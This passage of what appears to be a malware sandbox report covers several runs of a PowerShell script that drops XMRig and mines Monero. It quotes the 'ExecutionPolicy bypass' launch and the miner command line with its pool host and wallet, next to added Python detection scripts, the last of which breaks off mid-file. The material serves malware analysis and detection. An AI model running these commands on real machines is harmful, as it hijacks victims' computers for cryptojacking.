| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1260-0-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp
memory/1260-5-0x000001523CCA0000-0x000001523CCC2000-memory.dmp
memory/1260-8-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-9-0x00000152552D0000-0x0000015255346000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxhdinlh.0jg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1260-10-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-26-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-49-0x0000015255290000-0x00000152552A2000-memory.dmp
memory/1260-62-0x000001523CCE0000-0x000001523CCEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4412-91-0x0000023D69020000-0x0000023D69040000-memory.dmp
memory/4412-92-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/1260-94-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp
memory/4412-93-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/1260-95-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/4412-96-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-97-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-98-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-99-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-100-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-101-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-102-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-103-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-104-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-105-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-106-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-107-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-108-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-109-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-110-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-111-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-112-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-113-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-114-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-115-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-116-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-117-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-118-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-119-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-120-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-121-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-122-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-123-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-124-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-125-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-126-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-127-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-128-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-129-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-130-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-131-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-132-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-133-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-134-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-135-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-136-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-137-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-138-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-139-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-140-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-141-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-142-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-143-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-144-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-145-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-146-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-147-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-148-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-149-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-150-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-151-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-152-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-153-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-154-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-155-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-156-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:02
Platform
win10v2004-20240611-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2136 wrote to memory of 4908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2136 wrote to memory of 4908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2136-0-0x00007FFD407B3000-0x00007FFD407B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ri1tfvxn.5md.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2136-6-0x000001F2B1B20000-0x000001F2B1B42000-memory.dmp
memory/2136-11-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-12-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-14-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-16-0x000001F2B1210000-0x000001F2B121A000-memory.dmp
memory/2136-15-0x000001F2B1AF0000-0x000001F2B1B02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4908-47-0x0000018C66540000-0x0000018C66560000-memory.dmp
memory/4908-48-0x0000018C66580000-0x0000018C665A0000-memory.dmp
memory/4908-49-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-51-0x0000018C665A0000-0x0000018C665C0000-memory.dmp
memory/4908-52-0x0000018C665C0000-0x0000018C665E0000-memory.dmp
memory/2136-50-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/2136-54-0x00007FFD407B3000-0x00007FFD407B5000-memory.dmp
memory/4908-53-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-55-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/2136-56-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp
memory/4908-57-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-58-0x0000018C665A0000-0x0000018C665C0000-memory.dmp
memory/4908-59-0x0000018C665C0000-0x0000018C665E0000-memory.dmp
memory/4908-60-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-61-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-62-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-63-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-64-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-65-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-66-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-67-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-68-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-69-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-70-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-71-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-72-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-73-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-74-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-75-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-76-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-77-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-78-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-79-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-80-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-81-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-82-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-83-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-84-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-85-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-86-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-87-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-88-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-89-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-90-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-91-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-92-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-93-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-94-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-95-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-96-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-97-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-98-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-99-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-100-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-101-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-102-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-103-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-104-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-105-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-106-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-107-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-108-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-109-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-110-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-111-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-112-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-113-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-114-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-115-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-116-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-117-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
memory/4908-118-0x00007FF6E26F0000-0x00007FF6E3323000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2224 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2224 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
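The behavioral18, behavioral27 and behavioral3 runs record the same process chain: powershell.exe is launched with -ExecutionPolicy bypass on a .ps1 in the user's Temp directory, spawns xmrig.exe from a Temp subdirectory (the WriteProcessMemory rows are that parent writing into its child), and xmrig.exe connects with -o gulf.moneroocean.stream:10128 and a -u wallet. The AdjustPrivilegeToken rows fit: PowerShell takes SeDebugPrivilege, xmrig.exe asks for SeLockMemoryPrivilege, which it needs for large-page allocation. The script below is an added example, not part of the sandbox report, that turns this tree into a host-side check: it parses the miner's -o/-u arguments, validates the -u value as a Monero address, and flags PowerShell spawning an executable from a user-writable directory. The event records and their field names are constructed for the example (they loosely follow Sysmon Event ID 1), and the user-writable-directory heuristic is an assumption to tune per estate; the wallet and pool strings are copied from the command line above.

```python
"""Host-side detection of the PowerShell -> XMRig chain recorded in this report.

Added example, not part of the sandbox report. The event records below are
constructed to mirror the report's process tree; their field names are our own
(they loosely follow Sysmon Event ID 1) and are an assumption.
"""
import re

# Base58 alphabet used by Monero addresses (no 0, O, I, l).
_BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")

# Wallet and pool copied verbatim from the xmrig.exe command line in the report.
REPORT_WALLET = "45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"
REPORT_POOL = "gulf.moneroocean.stream:10128"

# XMRig accepts "-o host:port" / "--url=host:port" and "-u user" / "--user=user".
_POOL_RE = re.compile(r'(?:^|\s)(?:-o|--url)[ =]([^\s"]+)')
_USER_RE = re.compile(r'(?:^|\s)(?:-u|--user)[ =]([^\s"]+)')
_EXECPOL_RE = re.compile(r"-executionpolicy\s+bypass", re.IGNORECASE)

# Constructed sample: the report's two processes plus a benign control process.
SAMPLE_EVENTS = [
    {"pid": 2224, "ppid": 5008,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"'},
    {"pid": 1092, "ppid": 2224,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": rf'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o {REPORT_POOL} -u {REPORT_WALLET}'},
    {"pid": 3300, "ppid": 5008,  # control process: must produce no finding
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def is_monero_address(addr: str) -> bool:
    """Standard Monero address: 95 base58 chars starting with '4' ('8' for subaddresses)."""
    return len(addr) == 95 and addr[0] in "48" and all(c in _BASE58 for c in addr)


def parse_miner_cmdline(cmdline: str):
    """Return (host, port, user) when the command line carries a pool and a user, else None."""
    pool = _POOL_RE.search(cmdline)
    user = _USER_RE.search(cmdline)
    if not pool or not user:
        return None
    url = re.sub(r"^[a-z+]+://", "", pool.group(1))  # drop an optional stratum+tcp:// scheme
    host, sep, port = url.rpartition(":")          # split host from port on the last ':'
    if not sep or not port.isdigit():
        return None
    return host, int(port), user.group(1)


def in_user_writable_dir(path: str) -> bool:
    """Heuristic (an assumption): binaries launched from per-user temp or public dirs."""
    p = path.lower()
    return "\\appdata\\local\\temp\\" in p or "\\users\\public\\" in p


def analyze(events):
    """Emit findings for miner command lines and for PowerShell spawning a dropped EXE."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parsed = parse_miner_cmdline(e["cmdline"])
        if parsed:
            host, port, user = parsed
            findings.append({"type": "miner_cmdline", "pid": e["pid"], "pool_host": host,
                             "pool_port": port, "wallet": user,
                             "wallet_is_monero": is_monero_address(user)})
        parent = by_pid.get(e["ppid"])
        if (parent and parent["image"].lower().endswith("\\powershell.exe")
                and in_user_writable_dir(e["image"])):
            findings.append({"type": "powershell_spawned_dropped_exe", "pid": e["pid"],
                             "ppid": parent["pid"],
                             "execpolicy_bypass": bool(_EXECPOL_RE.search(parent["cmdline"]))})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The wallet and pool pair is the durable indicator here: the binary is stock XMRig 6.21.3 fetched over HTTPS (see the objects.githubusercontent.com rows), so its hash changes with every release while the operator's payout address does not.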
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
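The Network rows of this run and of behavioral18 and behavioral27 follow one order: a lookup of and TLS session to github.com and objects.githubusercontent.com (the miner download), then a lookup of gulf.moneroocean.stream and a TCP session to 149.102.143.109:10128. The in-addr.arpa rows are reverse (PTR) lookups of addresses the VM had already contacted and carry no signal of their own. The script below is an added example, not part of the report: it parses rows in this table's layout, drops the PTR noise, flags the pool lookup and the pool session on its non-standard port, and records whether a GitHub download preceded it. The rows embedded in it are copied from the behavioral3 table above; the pool-suffix list holds only the domain seen here and is meant to be extended from your own intelligence, and the download-then-mine correlation is our heuristic, not something the report asserts.

```python
"""Network-side triage of rows in this report's Network tables.

Added example, not part of the sandbox report. Input rows are copied from the
behavioral3 table in the report's own "| Country | Destination | Domain | Proto |"
layout. The pool-suffix list and the download-then-mine correlation are our
own heuristics (assumptions), not statements made by the report.
"""

# Constructed input: a subset of the behavioral3 Network table, in row order.
REPORT_ROWS = """
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
"""

# Mining-pool domain suffixes; only the one seen in this report, extend from your own intel.
POOL_SUFFIXES = ("moneroocean.stream",)


def parse_rows(text):
    """Parse '| Country | ip:port | Domain | Proto |' rows; header and malformed rows are skipped."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        ip, sep, port = dest.rpartition(":")
        if not sep or not port.isdigit():
            continue
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def is_ptr_noise(row):
    """Reverse lookups of peers already contacted; they add nothing to the verdict."""
    return row["domain"].endswith(".in-addr.arpa")


def pool_suffix(domain):
    """Return the matching pool suffix for a domain, or None."""
    return next((s for s in POOL_SUFFIXES if domain == s or domain.endswith("." + s)), None)
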